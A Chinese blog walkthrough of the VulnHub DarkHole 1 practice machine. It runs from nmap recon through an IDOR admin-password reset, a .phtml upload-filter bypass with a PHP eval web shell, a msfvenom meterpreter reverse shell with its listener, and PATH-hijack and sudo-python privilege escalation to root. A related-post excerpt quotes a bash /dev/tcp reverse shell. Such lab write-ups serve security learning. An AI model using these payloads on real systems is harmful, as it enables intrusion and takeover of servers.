VulnHub-DarkHole_1靶机渗透详解

最新推荐文章于 2024-06-13 19:48:05 发布
最新推荐文章于 2024-06-13 19:48:05 发布
阅读量246 收藏 2
点赞数
分类专栏: 靶机练习 文章标签: 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47372600/article/details/131251869
版权

1.靶机部署

kali安装https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://download.vulnhub.com/darkhole/DarkHole.zip
得到三个文件,稍后需要打开的shi.ovf的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
虚拟机的基本设置:
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描同一个段下存活的IP
nmap 192.168.11.0/24
发现155开启了80端口,通过访问确实是我们的靶机!
image.png

2.2 详细信息扫描

使用nmap对靶机开放的端口进行更详细的扫描:
nmap -A -T4 -p- 192.168.11.155
image.png

2.3 敏感目录

dirsearch -u 192.168.11.155 -e *
image.png

2.4 指纹收集

whatweb -v 192.168.11.155
image.png

3.渗透过程

拿到这么一个网站,暂时没有多余的线索,只有个登录页面:
image.png

3.1 注册账号

暴力破解不太现实,可以尝试一下注册个账号:
image.png
分别输入用户名,邮箱,密码:
image.png

3.2 登录网站

然后使用我们注册的用户登录:
image.png

3.3 越权操作

3.3.1 文件上传

这里我们使用bp抓包,修改id的值为1,然后提交数据试试:
不会bp抓包?建议先去学学BurpSuite使用和浏览器代理
image.png
这里我们停下来想想,id=2是我们新建的用户,那么id=1呢,是不是系统本来就有的账户,更疯狂点是不是管理员?
带着我们刚刚的猜测,实践一下,我们刚刚提交的密码是111,然后重新登录,用户名就猜测一下admin吧!、
登录成功!!!
image.png
发现相比普通用户,多了一个文件上传功能:那我们上传一个php一句话木马试试:
<?php @eval($_POST[cmd]);?)>
image.png
发现报错了,人家对后缀名有要求,那就只能换一种方式了,现在有两中方案:

  • 1.改一个人家允许的后缀名,然后使用bp抓包改回来
  • 2.上传一个比较冷梦的后缀名,又不影响程序运行,例如phtml

image.png
大道至简,先上传一个phtml的php文件试试,
phtml解释:image.png
创建文件:
image.png
上传文件:
image.png

3.3.2 蚁剑连接

image.png

3.4 反弹shell

3.4.1 生成php反弹shell脚本:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.128 lpor=4444 -o msfshell.php
image.png

3.4.2 开启ftp服务,靶机端下载

开启ftp服务:
python3 -m http.server 80
image.png
在靶机的upload文件夹下载:
image.png

3.4.3 kali端开启msf监听

开启msf,使用模块,设置参数和载荷:
use exploit/multi/handler
set lhost 192.168.11.128
set lport 4444
set payload php/meterpreter/reverse_tcp
image.png
设置完成后,查看设置:
show options
image.png
开启监听:
run
image.png
访问shell文件触发监听:
http://192.168.11.155//upload/msfshell.php
image.png
进入shell,并生成一个交互式shell:
shell
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
image.png

3.5 提权

查看敏感文件之后发现有两个用户:
cat /etc/passwd | grep /bin/bash
image.png
经过一番搜索,在john的家目录发现一个叫toto的文件,具有SUID权限,其作用是输出id:
image.png
既然如此,我们能不能修改一下环境变量,让他执行id命令的时候打开一个john的bash:

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

image.png
拿到john的权限之后,查看john的家目录,找到了密码:
image.png
查看john的权限:
这里需要输入密码

sudo -l

发现john可以以root的身份执行file这个python文件:
image.png
在file.py里面写一段打开shell的代码,再以root的身份执行:

echo “import pty;pty.spawn(‘/bin/bash’)” > file.py
sudo python3 /home/john/file.py

image.png
成功拿到root权限!!!

夺旗!!!

实话说,这个旗子抱看。
image.png

BearSec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
darkhole1靶场渗透通关
tpaer的博客
10-02 890
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
安全vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4114
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3695
vulnhub靶场——DarkHole 1 WriteUp
DarkHole_1
weixin_47311099的博客
09-27 893
DarkHole_1攻略 主机发现 ┌──(root????kali)-[~] └─# nmap -sP 192.168.8.0/24 目标靶机为192.168.8.134 全面端口扫描 ┌──(root????kali)-[~] └─# nmap -A 192.168.8.134 22ssh和80http 访问80 发现登录页面 但是我们并不知道用户名密码 越权 点击sign up now 去注册用户 登录后发现存在改密码选项,抓包查看 发现其id为2,可推测id为1的应该是默认的管
靶机渗透练习44-DarkHole-1
hirak0的博客
04-19 850
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-1,724/ Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Fo 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.142 注:靶机Kali
VulnHub-Bob靶机详细渗透过程
MRS_jianai的博客
12-27 500
VulnHub-Bob靶机详细渗透过程
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3202
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 963
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试。
Android WebSocket长连接的实现
Billy_Zuo的博客
06-12 1215
WebSocket 协议在2008年诞生,2011年成为国际标准。所有浏览器都已经支持了。它的最大特点就是,服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送信息,是真正的双向平等对话,属于[“服务器推送技术”]的一种。WebSocket的特点包括:建立在 TCP 协议之上,服务器端的实现比较容易。与 HTTP 协议有着良好的兼容性。默认端口也是80和443,并且握手阶段采用 HTTP 协议,因此握手时不容易屏蔽,能通过各种 HTTP 代理服务器。支持双向通信,实时性更强。
htb_office
weixin_62621015的博客
06-08 1002
hack the box windows
Java网络通信实现
ty2587的博客
06-10 160
【代码】Java网络通信实现。
数据通信与网络
最新发布
weixin_74923758的博客
06-13 374
例如,TCP(Transmission Control Protocol)使用三次握手的过程来建立连接:发送方首先发送一个带有SYN标志的数据包给接收方,接收方收到后回复SYN和ACK标志的数据包,最后发送方回复一个带有ACK标志的数据包,确认连接建立,这样就可以确保双方都同意开始数据传输。中心节点是主节点,网络中的各个节点通过点到点的方式连接到一个中心节点上,再由中心节点向目的节点传输信息。所以,要先把信息用0,1比特的组合表示出来,再将0,1比特转换成特定的电流或电压,通过物理链路发送出去。
什么是蠕虫病毒?
wanhengwangluo的博客
06-13 287
蠕虫病毒是网络安全领域中的一大威胁,蠕虫病毒有着极强的隐蔽性,传播速度十分快,有着极强的破坏力,会给企业正常运转的业务带来巨大的挑战,为了能够有效的应对蠕虫病毒,企业采取了一系列的技术性措施,构建一个多层次、全方位的防护体系来进行抵御蠕虫病毒。蠕虫病毒是一种常见的计算机病毒,会利用网络来进行复制和传播,它的传染途径是主要通过网络和电子邮件,蠕虫病毒和一般的病毒是不同的,它不需要附着在宿主程序当中,一般是通过端口漏洞来进行传播的。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值